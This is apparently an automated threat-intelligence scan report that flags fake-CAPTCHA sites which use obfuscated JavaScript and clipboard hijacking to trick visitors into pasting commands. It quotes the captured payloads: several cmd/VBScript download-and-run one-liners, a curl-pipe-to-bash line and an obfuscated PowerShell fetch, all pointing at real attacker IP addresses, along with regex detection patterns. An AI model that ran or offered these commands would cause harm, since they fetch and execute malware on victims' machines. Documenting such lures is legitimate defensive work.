Threat Intelligence Report

πŸ“… January 30, 2026 πŸ•’ Generated: 2026-01-30 03:23:05 πŸ” Sites Analyzed: 97
⬇️ Download JSON Report πŸ“ View All Reports on GitHub
🌐
97
Total Sites Analyzed
⚠️
59
Malicious Sites
61.0% detection rate
πŸ’»
27
PowerShell Commands
πŸ“‹
243
Clipboard Hijacks
πŸ“Š
1114
Avg Threat Score

Attack Pattern Analysis

47
High Risk Commands
1035
Base64 Encoded
3
Obfuscated JS
75
Inline JS Redirects
10
External JS Chains
33
Redirect Follows
PowerShell Commands 27
Clipboard Hijacks 243
Base64 Encoded 1035
CAPTCHA Elements 133
High Risk Commands 47
JS Redirects 75

Top Indicators/Keywords

hidden (18) robot (17) Robot (14) verification (14) Verification (13) Verification ID (12) Ray ID (12) I am not a robot (12) Verify you are human (12) CAPTCHA Verification (11) verification-id (11) Checking if you are human (11) To better prove you are not a robot (11) const command = (11) cmd (8)

Malicious Sites Detected

Click on a site to view detailed analysis
https://captolls.com
1787 indicators detected
Score: 51430 Fake CAPTCHA Obfuscated JS
3
obfuscation
1
captcha
38
base64
21
redirects
3
suspicious keywords

πŸ” Suspicious Keywords 3

Ray ID
robot
hidden

🌐 Extracted URLs 1

https://www.cloudflare.com/?utm_source=challenge&utm_campaign=m

πŸ” Obfuscated JavaScript

Showing first 2 of 3 entries (truncated for performance) 

{'script': '\n     (function(_0x2cc3ed,_0x2c9515){function _0x1fda6a(_0x52c5d2,_0x1f8c7a,_0x48f83c,_0x3b6f64,_0x2b31d3){return _0x5057(_0x2b31d3-0x287,_0x1f8c7a);}...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x435856=', 'var _0x244cc2='], 'count': 98}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ["_0x435856['push']", "_0x435856['shift']"], 'count': 732}, {'pattern': '_0x[a-f0-9]{2,6}\\s*=\\s*function', 'examples': ['_0x837010=function', '_0x382d1f=function'], 'count': 4}, {'pattern': '\\(function\\s*\\(\\s*_0x[a-f0-9]{2,6}\\s*,\\s*_0x[a-f0-9]{2,6}\\s*\\)', 'examples': ['(function(_0x2cc3ed,_0x2c9515)'], 'count': 1}, {'pattern': 'function\\s+_0x[a-f0-9]{4,8}', 'examples': ['function _0x1fda6a', 'function _0x468c42'], 'count': 211}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x435856=', 'var _0x244cc2='], 'count': 98}, {'pattern': 'var\\s+[a-zA-Z0-9_$]+\\s*=\\s*\\[\\s*(?:[\\\'"`].*?[\\\'"`]\\s*,\\s*){10,}', 'examples': ["var _0xee2a70=['WOy+W7qbmG','o8oZbSoUW50','BZtcMSo..."], 'count': 1}, {'pattern': 'var\\s+[a-zA-Z0-9_$]+\\s*=\\s*[\\\'"`][^\\\'"`]{50,}[\\\'"`]', 'examples': ["var _0x512618='abcdefghijklmnopqrstuvwxyzABCDEFGHI..."], 'count': 1}, {'pattern': '[a-zA-Z0-9_$]{1,3}\\[[\\\'"`]push[\\\'"`]\\]', 'examples': ["856['push']", "856['push']"], 'count': 2}, {'pattern': '[\\\'"`]\\\\x[0-9a-fA-F]{2}\\\\x[0-9a-fA-F]{2}[\\\'"`]', 'examples': ["'\\x0a\\x0a'"], 'count': 1}], 'score': 1149, 'position': 3589}
{'script': '\n  function _0x19e5(_0x276d57,_0x655d81){_0x276d57=_0x276d57-(0x952+-0x1*-0x18c1+0x499*-0x7);const _0xd43211=_0x5ab8();let _0x1e4906=_0xd43211[_0x276d...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x418c35='], 'count': 1}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0xd43211[_0x276d57]', "_0x19e5['GnHYaE']"], 'count': 369}, {'pattern': '_0x[a-f0-9]{2,6}\\s*=\\s*function', 'examples': ['_0x418c35=function', '_0x2644f2=function'], 'count': 7}, {'pattern': '\\(function\\s*\\(\\s*_0x[a-f0-9]{2,6}\\s*,\\s*_0x[a-f0-9]{2,6}\\s*\\)', 'examples': ['(function(_0x4ba92f,_0x31578f)'], 'count': 1}, {'pattern': 'function\\s+_0x[a-f0-9]{4,8}', 'examples': ['function _0x19e5', 'function _0x5ab8'], 'count': 143}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x418c35='], 'count': 1}, {'pattern': 'let\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['let _0x1e4906=', 'let _0x14f50d='], 'count': 14}, {'pattern': 'const\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['const _0xd43211=', 'const _0x33ac5f='], 'count': 59}, {'pattern': '[a-zA-Z0-9_$]{1,3}\\[[\\\'"`]push[\\\'"`]\\]', 'examples': ["de5['push']", "de5['push']"], 'count': 2}], 'score': 597, 'position': 140816}
https://3.18.128.17/
791 indicators detected
Score: 6077 Redirect Chain
5
base64
3
redirect chains
3
redirect follows
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 63

https://gmpg.org/xfn/11
https://3.18.128.17/feed/
https://3.18.128.17/comments/feed/
https://api.w.org/
https://3.18.128.17/wp-json/

πŸ” External JavaScript Redirect Chains

Showing first 2 of 3 chains (truncated for performance)

Script: https://3.18.128.17/wp-content/plugins/wpvr/public/js/video.js?ver=1
Type: script_src
Destination (first appearance): https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js
d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …
Script: https://3.18.128.17/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.js?ver=1
Type: base64_payload
Destination (first appearance): https://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…

πŸ›°οΈ Redirect Follower Findings (3)

Source: external_js
Method: script_src
d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …
Status: ok
/* videojs-vtt.js - v0.14.1 (https://github.com/gkatsev/vtt.js) built on 10-04-2018 */
!function(a){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=a();else if("function"==typeof define&&define.amd)define([],a);else{var b;b="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this,b.vttjs=a()}}(function(){return function a(b,c,d){function e(g,h){if(!c[g]){if(!b[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0... [truncated]
Source: external_js
Method: base64_payload
Chain: http://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…
Status: ok
<!DOCTYPE html>
<html lang="en">
<head>
  <title>SVG namespace</title>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  <link rel="stylesheet" type="text/css"
        href="https://www.w3.org/StyleSheets/TR/base"/>
</head>
<body>
<div class="head">
<p><a href="https://www.w3.org/"><img class="head"
src="https://www.w3.org/assets/logos/w3c/w3c-no-bars.svg" alt="W3C"/></a></p>
</div>
<p>
<strong>http://www.w3.org/2000/svg</strong> is an XML namespace, first defined in the 
... [truncated]
Source: external_js
Method: base64_payload
Chain: http://www.videolan.org/x264.html
 ftypmp42isomiso2avc1mp41freemdatEH, #x264 - core 142 r2479 dd79a61 - H.264/MPEG-4 AVC codec - Copyleft 2003-2014 - http://www.videolan.org/x264.html - options: cabac=1 ref=1 deblock=1:0:0 analyse=0x1:0x111 me=hex subme=2…
Status: ok
    <!DOCTYPE html>
    <html lang="en" >
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
                    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
        
        <meta name="Author" content="VideoLAN" />
        <meta name="Keywords" content=
        "VideoLAN, VLC, VLC player, VLC media player, download, media player, player download, codec, encoder, m... [truncated]
http://31.147.204.35/
994 indicators detected
Score: 4810 Redirect Chain
371
base64
9
redirects
1
redirect chains
1
redirect follows
3
suspicious keywords
1
high risk

πŸ” Suspicious Keywords 3

robot
verification
hidden

🌐 Extracted URLs 362

https://cf.bstatic.com
https://cf.bstatic.com
http://ogp.me/ns#
http://ogp.me/ns/fb#
http://ogp.me/ns/fb/booking_com#

πŸ” External JavaScript Redirect Chains

Showing first 1 of 1 chains (truncated for performance)

Script: https://cf.bstatic.com/static/js/main_cloudfront_sd/7d3fe39bc2dfe5fb6e218d630fc87193c54b6148.js
Type: script_src
Destination (first appearance): https://www.google.com/recaptcha/api.js?render=
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.…

πŸ›°οΈ Redirect Follower Findings (1)

Source: external_js
Method: script_src
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.…
Status: ok
/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');(cfg['anchor-ms']=cfg['anchor-ms']||[]).push(20000);(cfg['execute-ms']=cfg['execute-ms']||[]).push(30000);w['__google_recaptcha_clien... [truncated]
https://31.147.204.35/
994 indicators detected
Score: 4810 Redirect Chain
371
base64
9
redirects
1
redirect chains
1
redirect follows
3
suspicious keywords
1
high risk

πŸ” Suspicious Keywords 3

robot
verification
hidden

🌐 Extracted URLs 362

https://cf.bstatic.com
https://cf.bstatic.com
http://ogp.me/ns#
http://ogp.me/ns/fb#
http://ogp.me/ns/fb/booking_com#

πŸ” External JavaScript Redirect Chains

Showing first 1 of 1 chains (truncated for performance)

Script: https://cf.bstatic.com/static/js/main_cloudfront_sd/7d3fe39bc2dfe5fb6e218d630fc87193c54b6148.js
Type: script_src
Destination (first appearance): https://www.google.com/recaptcha/api.js?render=
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.…

πŸ›°οΈ Redirect Follower Findings (1)

Source: external_js
Method: script_src
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.…
Status: ok
/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');(cfg['anchor-ms']=cfg['anchor-ms']||[]).push(20000);(cfg['execute-ms']=cfg['execute-ms']||[]).push(30000);w['__google_recaptcha_clien... [truncated]
https://44.208.147.17/
543 indicators detected
Score: 3839
7
base64
1
redirects
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 79

https://gmpg.org/xfn/11
https://44.208.147.17/feed/
https://44.208.147.17/comments/feed/
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F&#038;format=xml
https://5.63.157.201/
98 indicators detected
Score: 2021 Redirect Chain
6
base64
1
redirects
1
redirect follows
5
suspicious keywords

πŸ” Suspicious Keywords 5

exec(ua) != nuii) { rv = parseFioat(RegExp.$i); } } eise if (n.appName == "Netscape") { rv = ii; re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)"); if (re.exec(ua) != nuii) { rv = parseFioat(RegExp.$i); } } } return rv; } })(window, document, navigator)
robot
verification
exec(
hidden

🌐 Extracted URLs 22

https://alfavit-obuv.ru/include/logo.png
https://alfavit-obuv.ru/
https://mc.yandex.ru/watch/55085083
https://5.63.157.201/
https://api.whatsapp.com/send/?phone=79168411253

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: script_src
{ return; }}
   k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(55085083, "init", {
        clickmap…
Status: ok
(function(){var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};
function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw... [truncated]
https://104.199.248.167/
95 indicators detected
Score: 1201 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
20
suspicious keywords
4
high risk

πŸ” Suspicious Keywords 20

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 7

https://t.me/Tarnkappe_info
https://104.199.248.167/
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://3.71.235.243/
338 indicators detected
Score: 915
1
base64
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 150

https://gmpg.org/xfn/11
https://3.71.235.243/feed/
https://3.71.235.243/comments/feed/
https://3.71.235.243/magaza/feed/
https://3.71.235.243/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.11.14
https://tesllamacapp.com/
87 indicators detected
Score: 904 PowerShell Clipboard Hijack
1
powershell
5
clipboard
6
captcha
13
base64
1
redirect follows
13
suspicious keywords

πŸ’» PowerShell Commands 1

curl

πŸ” Suspicious Keywords 13

command box */
Command </button>
command prompt.</strong>
command beiow:</strong>
Command = cmdEiement.getAttribute('data-reai-command');
command copied
captcha verification
robot
Verification
verification-ioader

🌐 Extracted URLs 5

https://icloud.com/security/verify
https://api.ipify.org?format=json
https://api.ipify.org?format=json
https://api.myip.com
https://httpbin.org/ip

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 5 entries (truncated for performance) 

...igator.clipboard && window.isSecureContext) { navigator.clipboard.writeText(textToCopy).then(() => { if (button) {...
...tArea.select(); try { const successful = document.execCommand('copy'); if (successful) { const button = even...

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: base64_payload
curl -s http://217.119.139.117/d/roberto32100 | nohup bash &
Status: error: HTTPConnectionPool(host='217.119.139.117', port=80): Max retries exceeded with url: /d/roberto32100 (Caused by ConnectTimeoutError(<HTTPConnection(host='217.119.139.117', port=80) at 0x7f67255b
http://104.199.248.167/
76 indicators detected
Score: 770 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://77.120.165.2/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://77.120.165.2/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://202.154.5.83:9092/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://88.198.19.78/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge
https://i.postimg.cc/k4zrz92z/111.png
http://78.40.209.164:5506/dk.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://174.142.195.203/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://104.219.248.200/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://74.50.99.45:8443/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://103.112.244.68/
175 indicators detected
Score: 665 Fake CAPTCHA
1
captcha
26
base64
2
redirects
1
suspicious keywords

πŸ” Suspicious Keywords 1

hidden

🌐 Extracted URLs 132

https://ogp.me/ns#
https://www.yppgiibandung.org/
https://www.yppgiibandung.org/igniter/an-component/media/upload-gambar-pendukung/footpath-691021_1280.jpg
http://localhost//igniter/an-component/media/upload-gambar-pendukung/20219478.png
https://www.yppgiibandung.org/an-theme/reMindz/assets/font-awesome/css/font-awesome.min.css
http://193.221.201.191/
39 indicators detected
Score: 622 PowerShell Clipboard Hijack
1
powershell
2
clipboard
3
captcha
6
base64
1
redirects
4
suspicious keywords

πŸ’» PowerShell Commands 1

powershell -wi mi (.'powershell' (. 'wget' -usebas '150.241.124.218:5509/r.txt'));I am not a bot - Verification ID: #8626 )

πŸ” Suspicious Keywords 4

Press CTRL + V
Press Enter
robot
hidden

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...= ""; } function copyToClipboard() { navigator.clipboard.writeText (atob("cG93ZXJzaGVsbCAtd2kgbWkgKC4ncG93ZXJzaGVsbCcg...
...tener("click", function(event) { event.preventDefault(); verifyBtn.disabled = true; verifyCaptcha(); }); checkboxBtn.addEventListener("click", function(event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } addCaptchaListeners(); function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function() { showCaptchaLoading(); }, 500) setTimeout(function() { showVerifyWindow(); }, 900) } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function showVerifyWindow() { verifyWindow.style.display = "block"; verifyWindow.style.visibility = "visible"; verifyWindow.style.opacity = "1"; verifyWindow.style.top = checkboxWindow.offsetTop - 80 + "px"; verifyWindow.style.left = checkboxWindow.offsetLeft + 54 + "px"; if (verifyWindow.offsetTop < 5) { verifyWindow.style.top = "5px"; } if (verifyWindow.offsetLeft + verifyWindow.offsetWidth > 